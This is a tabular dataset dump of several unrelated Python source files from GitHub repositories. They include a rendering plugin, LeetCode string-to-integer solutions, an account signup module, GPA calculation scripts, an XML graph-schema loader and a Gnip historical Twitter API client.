seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
24846411098 | from typing import Optional
from dataclasses import dataclass
import numpy as np
from commonroad_geometric.rendering.base_renderer_plugin import BaseRendererPlugin
from commonroad_geometric.rendering.types import RenderParams
from commonroad_geometric.rendering.viewer.viewer_2d import Viewer2D
@dataclass
class RenderDrivableAreaStyle():
...
class RenderDrivableAreaPlugin(BaseRendererPlugin):
def __init__(
self,
style: Optional[RenderDrivableAreaStyle] = None,
**kwargs
) -> None:
self.style = style if style is not None else RenderDrivableAreaStyle(**kwargs)
def __call__(
self,
viewer: Viewer2D,
params: RenderParams
) -> None:
data = params.data
if params.ego_vehicle is not None:
viewer.draw_rgb_image(
data=255*data.ego.drivable_area,
pos=data.ego.pos,
scale=0.2
)
else:
# drawing drivable area of first vehicle
viewer.draw_rgb_image(
data=255*data.v.drivable_area[0],
pos=data.v.pos[0],
scale=0.2
)
| CommonRoad/crgeo | commonroad_geometric/rendering/plugins/render_drivable_area_plugin.py | render_drivable_area_plugin.py | py | 1,172 | python | en | code | 25 | github-code | 13 |
4568744558 | class Solution:
def myAtoi(self, str):
"""
:type str: str
:rtype: int
"""
import re
res = ''
tmp = re.findall('^[-+]?[\d]+', str.strip()) # 正则判断,非法字符串会返回空,返回的必是带有一个+/-或无符号的数字串
if tmp:
ms = tmp[0]
if ms[0] == "-" or ms[0] == "+":
res = ms[1:]
else:
res = ms
res = int(res)
if ms[0] == "-":
return max(-res, -0x80000000)
return min(res, 0x7FFFFFFF)
else:
return 0
def myAtoi2(self, str):
"""
:type str: str
:rtype: int
"""
numset = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'}
op = {"-", "+"}
if str == "" or str.isspace():
return 0
ms = str.lstrip()
low = 0
res = 0
while low < len(ms) and ms[low] in op: # 判断符号位是否正确
low += 1
if low > 1 or low == len(ms): return 0 # 只有符号没有数字,或者符号多于一个
while low < len(ms):
if ms[low] in numset:
res = res * 10 + int(ms[low])
else:
break
low += 1
if ms[0] == "-":
return max(-res, -0x80000000)
return min(res, 0x7FFFFFFF)
| Weikoi/OJ_Python | leetcode/medium/8_字符串转换成整数.py | 8_字符串转换成整数.py | py | 1,417 | python | en | code | 0 | github-code | 13 |
71594426898 | from backend.resources.database import DBClient
import hashlib, os
def signup_account(**kwargs):
dbclient = DBClient()
collection = dbclient.db.accounts
try:
trytofind = dbclient.get_array(collection, {"username": kwargs['username']})
trytofind['username']
return False, "This username is already taken!"
except:
pass
kwargs['premium'] = False
kwargs['expiresIn'] = 0
kwargs['salt'] = os.urandom(64)
kwargs.pop('psw-repeat')
salt = hashlib.pbkdf2_hmac('sha256', kwargs['salt'], os.environ['salt_key'].encode(), 5000).hex().encode()
kwargs['psw'] = hashlib.pbkdf2_hmac('sha256', kwargs['psw'].encode(), salt, 20000).hex()
dbclient.create_doc(collection, kwargs)
return True, ''
def discord_signup(userid):
dbclient = DBClient()
collection = dbclient.db.accounts
account = dbclient.get_array(collection, {'username': str(userid), 'discord_account': True})
if account:
return True, ''
data = {}
data['username'] = str(userid)
data['discord_account'] = True
data['premium'] = False
data['expiresIn'] = 0
dbclient.create_doc(collection, data)
return True, '' | Try2Win4Glory/Lacan-NTSport-Website | backend/signup/signup.py | signup.py | py | 1,185 | python | en | code | 1 | github-code | 13 |
3720568810 | import sys
INT_MIN = -sys.maxsize
n = int(input())
s = list(map(int,input().split()))
dp = [INT_MIN for _ in range(n+1)]
a = s[:]
a.insert(0,0)
dp[0] = 0
for i in range(1,n+1):
for j in range(i):
if a[j] < a[i]:
dp[i] = max(dp[i],dp[j]+1)
print(max(dp)) | JaeEon-Ryu/Coding_test | LeeBrosCode/DP/5_조건에 맞게 선택적으로 전진하는 DP/1) 최대 증가 부분 수열.py | 1) 최대 증가 부분 수열.py | py | 282 | python | en | code | 1 | github-code | 13 |
27236290487 | from graph.core import *
import xml.etree.ElementTree as ET
from lxml import etree
v4_namespace_uri = "https://poets-project.org/schemas/virtual-graph-schema-v4"
from graph.load_xml_v3 import XMLSyntaxError, get_attrib, \
get_attrib_defaulted, get_attrib_optional, get_attrib_optional_bool, \
get_child_text
from graph.parse_v4_structs import parse_struct_def_string, parse_struct_init_string, convert_def_to_typed_data_spec
import re
import os
import sys
import json
from typing import *
ns={"p":v4_namespace_uri}
# Precalculate, as these are on inner loop for (DevI|ExtI) and EdgeI
_ns_DevI="{{{}}}DevI".format(ns["p"])
_ns_ExtI="{{{}}}ExtI".format(ns["p"])
_ns_EdgeI="{{{}}}EdgeI".format(ns["p"])
# Precalculate for parsing of the device types (DeviceType | ExternalType )
_ns_DeviceType="{{{}}}DeviceType".format(ns["p"])
_ns_ExternalType="{{{}}}ExternalType".format(ns["p"])
_ns_brackets="{"+v4_namespace_uri+"}"
def deNS(t):
return t.replace(_ns_brackets,"p:")
def load_struct_spec(parentElt, eltName):
n=parentElt.find(eltName, ns)
if n==None:
raise XMLSyntaxError(f"Missing struct spec node {eltName}", parentElt)
src=n.text
df=parse_struct_def_string(src)
return convert_def_to_typed_data_spec(df)
def load_struct_instance(spec, elt, attr):
val=get_attrib_optional(elt, attr)
if val==None:
return None
init=parse_struct_init_string(val)
value=spec.convert_v4_init(init)
assert(spec.is_refinement_compatible(value))
return spec.expand(value)
def load_message_type(parent,mtElt):
id=get_attrib(mtElt,"id")
try:
message=load_struct_spec(mtElt, "p:Message")
return MessageType(parent,id,message,)
except XMLSyntaxError:
raise
except Exception as e:
raise XMLSyntaxError("Error while parsing message type {}".format(id),mtElt,e)
def load_external_type(graph,dtNode,sourceFile):
id=get_attrib(dtNode,"id")
state=None
properties=load_struct_spec(dtNode, "p:Properties")
shared_code=[]
metadata=None
documentation=None
dt=DeviceType(graph,id,properties,state,metadata,shared_code, True, documentation)
for p in dtNode.findall("p:InputPin", ns):
name=get_attrib(p,"name")
message_type_id=get_attrib(p,"messageTypeId")
if message_type_id not in graph.message_types:
raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
message_type=graph.message_types[message_type_id]
state=None # pins of ExternalType cannot have any state, properties, or handlers
properties=None
handler=''
is_application=False # Legacy: must be false, eventually will be removed
sourceLine=0
pinMetadata=None
dt.add_input(name,message_type,is_application,properties,state,pinMetadata, handler,sourceFile,sourceLine)
sys.stderr.write(" Added external input {}\n".format(name))
for p in dtNode.findall("p:OutputPin", ns):
name=get_attrib(p,"name")
message_type_id=get_attrib(p,"messageTypeId")
if message_type_id not in graph.message_types:
raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
message_type=graph.message_types[message_type_id]
is_application=False # Legacy: must be false, eventually will be removed
handler=''
sourceLine=0
pinMetadata=None
dt.add_output(name,message_type,is_application,pinMetadata,handler,sourceFile,sourceLine)
sys.stderr.write(" Added external output {}\n".format(name))
dt.ready_to_send_handler=''
dt.ready_to_send_source_line=0
dt.ready_to_send_source_file=None
return dt
def load_device_type(graph,dtNode,sourceFile):
id=get_attrib(dtNode,"id")
properties=load_struct_spec(dtNode, "p:Properties")
state=load_struct_spec(dtNode, "p:State")
shared_code=[]
tt=get_child_text(dtNode, "p:SharedCode", ns)[0]
if tt is not None:
shared_code.append(tt)
metadata=None
documentation=None
dt=DeviceType(graph,id,properties,state,metadata,shared_code,isExternal=False,documentation=documentation)
for p in dtNode.findall("p:InputPin",ns):
name=get_attrib(p,"name")
message_type_id=get_attrib(p,"messageTypeId")
if message_type_id not in graph.message_types:
raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
message_type=graph.message_types[message_type_id]
# NOTE: application pin support needed for as long as 2to3 is relevant.
is_application=get_attrib_optional_bool(p,"application") # TODO: REMOVE APPLICATION PIN
properties=load_struct_spec(p, "p:Properties")
state=load_struct_spec(p, "p:State")
pinMetadata=None
documentation=None
(handler,sourceLine)=get_child_text(p,"p:OnReceive",ns)
dt.add_input(name,message_type,is_application,properties,state,pinMetadata, handler,sourceFile,sourceLine,documentation)
#sys.stderr.write(" Added input {}\n".format(name))
for p in dtNode.findall("p:OutputPin",ns):
name=get_attrib(p,"name")
message_type_id=get_attrib(p,"messageTypeId")
if message_type_id not in graph.message_types:
raise XMLSyntaxError("Unknown messageTypeId {}".format(message_type_id),p)
is_application=False
is_indexed=get_attrib_optional_bool(p,"indexed")
message_type=graph.message_types[message_type_id]
pinMetadata=None
(handler,sourceLine)=get_child_text(p,"p:OnSend",ns)
documentation = None
dt.add_output(name,message_type,is_application,pinMetadata,handler,sourceFile,sourceLine,documentation,is_indexed)
#sys.stderr.write(" Added input {}\n".format(name))
(handler,sourceLine)=get_child_text(dtNode,"p:ReadyToSend",ns)
dt.ready_to_send_handler=handler
dt.ready_to_send_source_line=sourceLine
dt.ready_to_send_source_file=sourceFile
(handler,sourceLine)=get_child_text(dtNode,"p:OnInit", ns)
dt.init_handler=handler
dt.init_source_line=sourceLine
dt.init_source_file=sourceFile
(handler,sourceLine)=get_child_text(dtNode,"p:OnHardwareIdle",ns)
dt.on_hardware_idle_handler=handler
dt.on_hardware_idle_source_line=sourceLine
dt.on_hardware_idle_source_file=sourceFile
(handler,sourceLine)=get_child_text(dtNode,"p:OnDeviceIdle",ns)
dt.on_device_idle_handler=handler
dt.on_device_idle_source_line=sourceLine
dt.on_device_idle_source_file=sourceFile
return dt
def load_graph_type(graphNode, sourcePath):
deviceTypeTag = "{{{}}}DeviceType".format(ns["p"])
externalTypeTag = "{{{}}}ExternalType".format(ns["p"])
id=get_attrib(graphNode,"id")
sys.stderr.write(" Loading graph type {}\n".format(id))
properties=load_struct_spec(graphNode, "p:Properties")
metadata=None
documentation=None
shared_code=[]
tt=get_child_text(graphNode, "p:SharedCode", ns)[0]
if tt is not None:
shared_code.append(tt)
graphType=GraphType(id,properties,metadata,shared_code,documentation)
for etNode in graphNode.findall("p:MessageTypes/p:*",ns):
et=load_message_type(graphType,etNode)
graphType.add_message_type(et)
for dtNode in graphNode.findall("p:DeviceTypes/p:*",ns):
if dtNode.tag == deviceTypeTag:
dt=load_device_type(graphType, dtNode, sourcePath)
graphType.add_device_type(dt)
#sys.stderr.write(" Added device type {}\n".format(dt.id))
elif dtNode.tag == externalTypeTag:
et=load_external_type(graphType,dtNode,sourcePath)
graphType.add_device_type(et)
#sys.stderr.write(" Added external device type {}\n".format(et.id))
else:
raise RuntimeError(f"Unknown or unsupported element in DeviceTypes: {dtNode.tag}")
return graphType
def load_external_instance(graph, eiNode):
id=get_attrib(eiNode,"id")
external_type_id=get_attrib(eiNode,"type")
if external_type_id not in graph.graph_type.device_types:
raise XMLSyntaxError("Unknown external type id {}, known devices = [{}]".format(external_type_id, [d.di for d in graph.graph_type.deivce_types.keys()]), eiNode)
external_type=graph.graph_type.device_types[external_type_id]
properties=load_struct_instance(external_type.properties, eiNode, "P")
metadata=None
return DeviceInstance(graph,id,external_type,properties,metadata)
def load_device_instance(graph,diNode):
id=get_attrib(diNode,"id")
device_type_id=get_attrib(diNode,"type")
if device_type_id not in graph.graph_type.device_types:
raise XMLSyntaxError("Unknown device type id {}, known devices = [{}]".format(device_type_id,
[d.id for d in graph.graph_type.device_types.keys()]
),
diNode
)
device_type=graph.graph_type.device_types[device_type_id]
properties=load_struct_instance(device_type.properties, diNode, "P")
state=load_struct_instance(device_type.state, diNode, "S")
state=None
metadata=None
return DeviceInstance(graph,id,device_type,properties,state,metadata)
_split_path_re=re.compile("^([^:]+):([^-]+)-([^:]+):([^-]+)$")
def load_edge_instance(graph,eiNode):
path=eiNode.attrib["path"]
(dst_device_id,dst_pin_name,src_device_id,src_pin_name)=_split_path_re.match(path).groups()
send_index=eiNode.attrib.get("sendIndex")
dst_device=graph.device_instances[dst_device_id]
src_device=graph.device_instances[src_device_id]
assert dst_pin_name in dst_device.device_type.inputs, "Couldn't find input pin called '{}' in device type '{}'. Inputs are [{}]".format(dst_pin_name,dst_device.device_type.id, [p for p in dst_device.device_type.inputs])
assert src_pin_name in src_device.device_type.outputs
dst_pin_type=dst_device.device_type.inputs[dst_pin_name]
properties=load_struct_instance(dst_pin_type.properties, eiNode, "P")
state=load_struct_instance(dst_pin_type.state, eiNode, "S")
metadata=None
return EdgeInstance(graph,dst_device,dst_pin_name,src_device,src_pin_name,properties,metadata, send_index, state=state)
def load_graph_instance(graphTypes, graphNode):
devITag = "{{{}}}DevI".format(ns["p"])
extITag = "{{{}}}ExtI".format(ns["p"])
edgeITag = "{{{}}}EdgeI".format(ns["p"])
id=get_attrib(graphNode,"id")
graphTypeId=get_attrib(graphNode,"graphTypeId")
graphType=graphTypes[graphTypeId]
properties=load_struct_instance(graphType.properties, graphNode, "P")
metadata=None # TODO: Load metadata
documentation=None
graph=GraphInstance(id,graphType,properties,metadata, documentation)
disNode=graphNode.findall("p:DeviceInstances",ns)
assert(len(disNode)==1)
for diNode in disNode[0]:
assert (diNode.tag==devITag) or (diNode.tag==extITag)
if diNode.tag==devITag:
di=load_device_instance(graph,diNode)
graph.add_device_instance(di)
elif diNode.tag==extITag:
ei=load_external_instance(graph,diNode)
graph.add_device_instance(ei)
eisNode=graphNode.findall("p:EdgeInstances",ns)
assert(len(eisNode)==1)
for eiNode in eisNode[0]:
assert eiNode.tag==edgeITag
ei=load_edge_instance(graph,eiNode)
graph.add_edge_instance(ei)
return graph
def v4_load_graph_types_and_instances(doc : etree.Element , basePath:str) -> (GraphType, Optional[GraphInstance]):
graphsNode = doc
graphType=None
graphInst=None
try:
for gtNode in graphsNode.findall("p:GraphType",ns):
sys.stderr.write("Loading graph type\n")
assert graphType==None
graphType=load_graph_type(gtNode, basePath)
assert graphType, "No GraphType element."
graphTypes={graphType.id : graphType}
for giNode in graphsNode.findall("p:GraphInstance",ns):
sys.stderr.write("Loading graph instance\n")
assert graphInst is None
graphInst=load_graph_instance(graphTypes, giNode)
return (graphType,graphInst)
except XMLSyntaxError as e:
sys.stderr.write(str(e)+"\n")
if e.node is not None:
sys.stderr.write(etree.tostring(e.node, pretty_print = True, encoding='utf-8').decode("utf-8")+"\n")
raise e
| joshjennings98/fyp | graph_schema-4.2.0/apps/clocked_izhikevich/graph/load_xml_v4.py | load_xml_v4.py | py | 12,485 | python | en | code | 0 | github-code | 13 |
34294237065 | from infoReadin import *
from configReadin import *
import joblib
import os
config = get_config()
conf_dir = config["config_dir"]
baoy_files = {"化学":read_lesson_dem(conf_dir+"保研化学.txt"),
"应用化学":read_lesson_dem(conf_dir+"保研应化.txt"),
"应用化学(化学生物学)":read_lesson_dem(conf_dir+"保研化生.txt")}
data_path = config["rawdata_dir"]+config["filename"]
assert config["task_idx"] in "01234"
task_id = int(config["task_idx"])
basename = config["filename"].split(".")[0]
cache_path = config["cache_dir"]+f"{basename}.joblib"
if os.path.isfile(cache_path) and config["use_cache"]=="1":
all_dict = joblib.load(cache_path)
else:
all_dict = readin(data_path,config)
joblib.dump(all_dict, cache_path)
def output_single(filename,record,mod=None):
with open(filename,"w",encoding="ANSI") as f:
f.write("课程,学分,成绩,绩点,学分绩\n")
rec_list = mod if mod else record.keys()
for item in rec_list:
temp = record.get(item)
credit = str(mod[item]) if mod!=None else record[item].credit
Gcredit = record[item].Gcredit if temp!=None else None
cregra = record[item].cregra if temp!=None else None
score = record[item].score if temp!=None else None
f.write(f"{item},{credit},{score},{Gcredit},{cregra}\n")
def output_baoy(filename,res_dict):
f = open(filename,"w")
f.close()
with open(filename,"a",encoding="ANSI") as f:
f.write("学号,姓名,专业,保研绩点,备注\n")
for item in res_dict:
id = item
name = res_dict[id][0]
major = res_dict[id][1]
temp = res_dict[id][2]
res = temp[0]
record = temp[1]
num_aqu = len(baoy_files[major])
note = f"应修{num_aqu};实修{len(record)}" if len(record)<num_aqu else ""
output_single(f"personal/{name}.csv",{i.name:i for i in record},
mod=baoy_files[major])
f.write(f"{id},{name},{major},{res},{note}\n")
return
def output_ADE(filename,res_dict):
f = open(filename,"w")
f.close()
with open(filename,"a",encoding="ANSI") as f:
f.write("学号,姓名,专业,GPA\n")
for item in res_dict:
id = item
name = res_dict[id][0]
major = res_dict[id][1]
temp = res_dict[id][2]
res = temp[0]
record = temp[1]
output_single(f"personal/{name}.csv",{i.name:i for i in record})
f.write(f"{id},{name},{major},{res}\n")
return
def output_C(filename,res_dict):
f = open(filename,"w")
f.close()
with open(filename,"a",encoding="ANSI") as f:
temp0 = list(res_dict.values())[0][2]
temp1 = [key for key in temp0]
title = "学号,姓名,专业,"+",".join(temp1)
f.write(title+"\n")
for item in res_dict:
id = item
name = res_dict[id][0]
major = res_dict[id][1]
message = f"{id},{name},{major},"
temp2 = [str(res_dict[id][2][key]) for key in res_dict[id][2]]
message = message+",".join(temp2)+"\n"
f.write(message)
return res_dict
def taskB(filename="result.csv"):
res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(
1,demand=baoy_files[all_dict[i].major],
A_lis=config["B_Aclass"])] for i in all_dict}
output_baoy(filename,res_dict)
def taskA(filename="result.csv"):
res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(0)] for i in all_dict}
output_ADE(filename,res_dict)
def taskE(filename="result.csv"):
res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(4)] for i in all_dict}
output_ADE(filename,res_dict)
def taskD(filename="result.csv"):
res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(
3,demand=config["D_only"],
A_lis=config["D_Aclass"])] for i in all_dict}
output_ADE(filename,res_dict)
def taskC(filename="result.csv"):
demand_list = ["C_condition_line","C_zx_line","C_condition_keybm","C_condition_keyxz",
"C_condition_keyname","C_zb_line","C_zb_name"]
res_dict = {i:[all_dict[i].name,all_dict[i].major,all_dict[i].calculate(
2,demand=[config[j] for j in demand_list],major=all_dict[i].major)] for i in all_dict}
return output_C(filename,res_dict)
| Jingdan-Chen/WGA | task.py | task.py | py | 4,519 | python | en | code | 0 | github-code | 13 |
15937278946 | # Python program to read
# file word by word
# opening the text file
attributes = []
with open('dump.txt','r') as file:
# reading each line
for line in file:
# reading each word
for word in line.split(","):
# displaying the words
attributes.append(word)
with open('winrar_data.txt','w') as file1:
for i in attributes:
file1.write(i+"\n")
| Abhishek-yd/Malware-Dectection-Software-Powered-by-Machine-Learning | attributes.py | attributes.py | py | 391 | python | en | code | 1 | github-code | 13 |
16605770841 | #!/usr/bin/env python
import requests
import json
import sys
import datetime
from .gnip_historical_job import *
class DataSetResults(object):
def __init__(self, resDict):
#print(resDict.keys())
if "urlList" in resDict:
self.dataURLs = resDict["urlList"]
elif "url_list" in resDict:
self.dataURLs = resDict["url_list"]
else:
self.dataURLs = []
if "urlCount" in resDict:
self.URLCount = int(resDict["urlCount"])
elif "url_count" in resDict:
self.URLCount = int(resDict["url_count"])
else:
self.URLCount = -1
if "totalFileSizeBytes" in resDict:
self.fileSizeBytes = int(resDict["totalFileSizeBytes"])
elif "total_file_size_bytes" in resDict:
self.fileSizeBytes = int(resDict["total_file_size_bytes"])
else:
self.fileSizeBytes = -1
if "susptectMinuteURL" in resDict:
self.suspectMinuteURLs = resDict["suspectMinuteURL"]
else:
self.suspectMinuteURLs = []
def write(self):
with open("./data_files.txt", "wb") as f:
for i in self.dataURLs:
f.write("%s\n"%i)
if self.suspectMinuteURLs != []:
with open("./suspect_files.txt", "wb") as f:
for i in self.suspectMinuteURLs:
f.write("%s\n"%i)
def __repr__(self):
res = 'DATA SET:\n'
res += ' No. of URLs ............. {0:,}\n'.format(self.URLCount)
res += ' File size (bytes)........ {0:,}\n'.format(self.fileSizeBytes)
if len(self.dataURLs) > 5:
tmpList = self.dataURLs[:5] + ["..."]
else:
tmpList = self.dataURLs
tmpStr = str('\n'.join(tmpList))
res += ' Files (URLs) ............ %s\n'%(tmpStr)
if len(self.suspectMinuteURLs) > 5:
tmpList = self.suspectMinuteURLs[:5] + ["..."]
else:
tmpList = self.suspectMinuteURLs
tmpStr = str('\n'.join(tmpList))
if len(self.suspectMinuteURLs) > 0:
res += ' Suspect (URLs) .......... %s\n'%(tmpStr)
return res
#
#
#
class Result(object):
def __init__(self, resDict, gnipHist):
#print(str(resDict))
self.completedAt = datetime.datetime.strptime(DATE_RE.search(resDict["completedAt"]).group(0),DATEFMT)
try:
self.activityCount = int(resDict["activityCount"])
except TypeError:
self.activityCount = -1
try:
self.fileCount = int(resDict["fileCount"])
except TypeError:
self.fileCount = -1
try:
self.fileSize = float(resDict["fileSizeMb"])
except TypeError:
self.fileSize = -1
#self.dataFileURL = repairStagingURLs(resDict["dataURL"])
self.dataFileURL = resDict["dataURL"]
self.gnipHist = gnipHist
self.dataSetResult = None
self.getDataSetResult()
def getDataSetResult(self):
if self.dataFileURL is not None:
dataDict = self.gnipHist.getDataURLDict(self.dataFileURL)
if dataDict is not None:
self.dataSetResult = DataSetResults(dataDict)
def write(self):
if self.dataSetResult is not None:
self.dataSetResult.write()
def __repr__(self):
res = 'RESULT:\n'
res += ' Job completed at ........ %s\n'%(self.completedAt)
res += ' No. of Activities ....... {0:,}\n'.format(self.activityCount)
res += ' No. of Files ............ {0:,}\n'.format(self.fileCount)
res += ' Files size (MB) ......... {0:,}\n'.format(self.fileSize)
res += ' Data URL ................ %s\n'%(self.dataFileURL)
if self.dataSetResult is not None:
res += str(self.dataSetResult)
return res
#
#
#
class Quote(object):
def __init__(self, quoteDict):
# print(str(quoteDict))
if "costDollars" in quoteDict:
try:
self.costDollars = float(quoteDict["costDollars"])
except TypeError:
self.costDollars = -1
else:
self.costDollars = -1
self.estimatedActivityCount = int(quoteDict["estimatedActivityCount"])
self.estimatedDurationHours = float(quoteDict["estimatedDurationHours"])
self.estimatedFileSizeMb = float(quoteDict["estimatedFileSizeMb"])
if "expiresAt" in quoteDict and quoteDict["expiresAt"] is not None:
self.expiresAt = datetime.datetime.strptime(DATE_RE.search(quoteDict["expiresAt"]).group(0), DATEFMT)
else:
self.expiresAt = "N/A"
def __repr__(self):
res = 'QUOTE:\n'
res += ' Est. Cost ............... $ %.2f\n'%(self.costDollars)
res += ' Est. No. of Activities .. {0:,}\n'.format(self.estimatedActivityCount)
res += ' Est. Hours to Complete .. %.1f\n'%(self.estimatedDurationHours)
res += ' Est. # filesize (MB)..... {0:,}\n'.format(self.estimatedFileSizeMb)
res += ' Expires at .............. %s\n'%(self.expiresAt)
return res
#
#
#
class Status(object):
"""This and jobParameters have the same base class?"""
def __init__(self, statusDict, gnipHist=None):
if statusDict is None or statusDict["status"] == "error":
self.status = 'Error retrieving Job status'
if "reason" in statusDict:
self.status += ": {}".format(statusDict["reason"])
self.statusMessage = 'Please verify your connection parameters and network connection'
self.title = "{} -- {}".format(self.status, self.statusMessage)
self.jobURL = None
else:
#
self.title = statusDict["title"]
self.publisher = statusDict["publisher"]
self.streamType = statusDict["streamType"]
self.fromDate = datetime.datetime.strptime(statusDict["fromDate"], SHORT_DATEFMT)
self.toDate = datetime.datetime.strptime(statusDict["toDate"], SHORT_DATEFMT)
# self.jobURL = repairStagingURLs(statusDict["jobURL"])
self.jobURL = statusDict["jobURL"]
# Possible job progress
self.requestedBy = self.set("requestedBy", statusDict)
self.account = self.set("account", statusDict)
self.format = self.set("format", statusDict)
self.status = self.set("status", statusDict)
self.statusMessage = self.set("statusMessage", statusDict)
if "percentComplete" in statusDict:
self.percentComplete = float(self.set("percentComplete",statusDict))
else:
self.percentComplete = 0.0
if "requestedAt" in statusDict:
self.requestedAt = datetime.datetime.strptime(DATE_RE.search(statusDict["requestedAt"]).group(0), DATEFMT)
else:
self.requestedAt = None
if "acceptedAt" in statusDict:
self.acceptedAt = datetime.datetime.strptime(DATE_RE.search(statusDict["acceptedAt"]).group(0),DATEFMT)
self.acceptedBy = statusDict["acceptedBy"]
else:
self.acceptedAt = None
self.acceptedBy = None
if "quote" in statusDict:
self.quote = Quote(statusDict["quote"])
else:
self.quote = None
if "results" in statusDict and gnipHist is not None:
self.result = Result(statusDict["results"], gnipHist)
else:
self.result = None
def set(self, f, d, n=False):
if f in d:
return d[f]
else:
if n:
return -1
else:
return None
def __repr__(self):
res = '*'*(8+len(self.title)) + '\n'
res += '*** %s ***\n'%self.title
res += '*'*(8+len(self.title)) + '\n\n'
if self.jobURL is None:
return res
else:
res += 'Job URL: %s\n\n'%self.jobURL
if self.acceptedAt is not None:
res += 'Job accepted date ........ %s\n'%self.acceptedAt
res += 'From date ................ %s\n'%self.fromDate
res += 'To date .................. %s\n'%self.toDate
res += 'Request date ............. %s\n'%self.requestedAt
res += 'Status ................... %s\n'%self.status
res += 'Status message ........... %s\n'%self.statusMessage
res += 'Percent complete ......... %2.2f\n'%self.percentComplete
if self.quote is not None:
res += str(self.quote)
if self.result is not None:
res += str(self.result)
return res
#
#
#
class GnipHistorical(object):
def __init__(self, UN, PWD, baseUrl, jParsObj = None):
self.user_name = UN
self.password = PWD
self.baseUrl = baseUrl
self.jobPars = jParsObj
self.status = None # status object created when job status is retrieved
def acceptJob(self, jobURL):
"""Accept a quoted job."""
return self.xJob(jobURL, {"status":"accept"})
def rejectJob(self, jobURL):
"""Reject a quoted job."""
return self.xJob(jobURL, {"status":"reject"})
def xJob(self, jobURL, payload):
"""Make the server request to accept or reject a job."""
res = None
try:
s = requests.Session()
s.auth = (self.user_name, self.password)
s.headers = {'content-type':'application/json'}
res = s.put(jobURL, data=json.dumps(payload))
except requests.exceptions.ConnectionError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
except requests.exceptions.HTTPError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
if res is not None and res.status_code == 200:
return "Job {}ed successfully".format(payload["status"])
else:
return "Request failed with response code ({}): {}".format(res.status_code, res.text)
def createJob(self):
res = None
try:
s = requests.Session()
s.auth = (self.user_name, self.password)
s.headers = {'content-type':'application/json'}
res = s.post(self.baseUrl + "publishers/twitter/jobs.json", data=str(self.jobPars))
except requests.exceptions.ConnectionError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
except requests.exceptions.HTTPError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
return Status(res.json())
def listJobs(self):
"""Generator of jobs from the server. Jobs are generated in order and include every status
type. The number of items returned depends on the history in the server job log."""
res = None
try:
s = requests.Session()
s.auth = (self.user_name, self.password)
res = s.get(self.baseUrl + "publishers/twitter/jobs.json")
except requests.exceptions.ConnectionError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
except requests.exceptions.HTTPError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
if res is not None and "jobs" in res.json():
for x in res.json()["jobs"]:
yield Status(x)
else:
yield {"status": "Status Error: Server failed to return valid JSON object"}
def getDataURLDict(self, URL):
"""Return job record data download urls for the specified job. The url proivided should be the
specific url with job id provided by the system and must be in the current job
log. That is, the url must represent a valid job that would be retrieved with e.g. listJobs."""
res = None
try:
s = requests.Session()
s.auth = (self.user_name, self.password)
res = s.get(URL)
except requests.exceptions.ConnectionError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
except requests.exceptions.HTTPError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
if res is not None:
return res.json()
else:
return {"status": "Status Error: Server failed to return valid JSON object"}
def getJobStatusDict(self, jobURL = None):
"""Return job record for the specified job. The url proivided should be the
specific url with job id provided by the system and must be in the current job
log. That is, the url must represent a valid job that would be retrieved with e.g. listJobs."""
res = None
if jobURL is None:
try:
jobURL = self.status.jobURL
except:
sys.stderr.write("No job specified.\n")
return res
try:
s = requests.Session()
s.auth = (self.user_name, self.password)
res = s.get(jobURL)
except requests.exceptions.ConnectionError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
except requests.exceptions.HTTPError as e:
sys.stderr.write( "Server request failed with message {}".format(e))
if res is not None:
return res.json()
else:
return {"status": "Status Error: Server failed to return valid JSON object"}
def getJobStatus(self, jobURL = None):
self.jobStatus(jobURL)
return self.status
def jobStatus(self, jobURL = None):
# call jobStatus to get latest from server
res = self.getJobStatusDict(jobURL)
self.status = Status(res, self)
return ' - '.join([self.status.status, self.status.statusMessage])
def quote(self, jobURL = None):
# uses existing record if possible
if self.status is None:
self.jobStatus(jobURL)
if "quote" in self.status:
return self.status.quote
else:
sys.stderr.write("No quote available.\n")
return None
def results(self, jobURL = None):
# uses existing record if possible
if self.status is None:
self.jobStatus(jobURL)
if self.status.result is not None:
return self.status.result
else:
sys.stderr.write("No results available.\n")
return None
#
#
#
if __name__ == '__main__':
# Run some simple demos/tests
####################################
# Working with job parameters
# Example 1
from pprint import pprint
jp = JobParameters("BieberJob1")
jp.setFromDate("2012-01-01T00:00:00")
jp.setToDate("2012-01-01T00:01:00")
tmp = jp.getToDate()
jp.setToDate("201201010001") # same as above
print(jp.getToDate(), "=", tmp)
jp.setUser("DrSkippy27")
jp.addRule("bieber", "bestRuleEver")
# job json as string
print(jp)
# job json as dict
pprint(jp.job)
print("Job duration = ",jp.duration().seconds)
print
# Example 2
# save job description in file
jp.writeToFile("./bieber_job1.json")
# Example 3
# read job description from file
jp1 = JobParameters("BieberJob2", jobFileName = "./FileMissing.JSON") # this file doesn't exist
jp1 = JobParameters("BieberJob2", jobFileName = "./bieber_job1.json")
print(jp1)
print
# mess it up
jp1.setFromDate("2012-01-01T00:02:00")
try:
print(jp1) # error
except ValueError as e:
print(e)
print
# Example 4
# working with rules
jp3 = JobParameters("BieberJob2", jobFileName = "./bieber_job1.json")
jp3.setRules([{"value": "no bieber"}])
print(jp3)
jp3.addRule("belieber")
print(jp3)
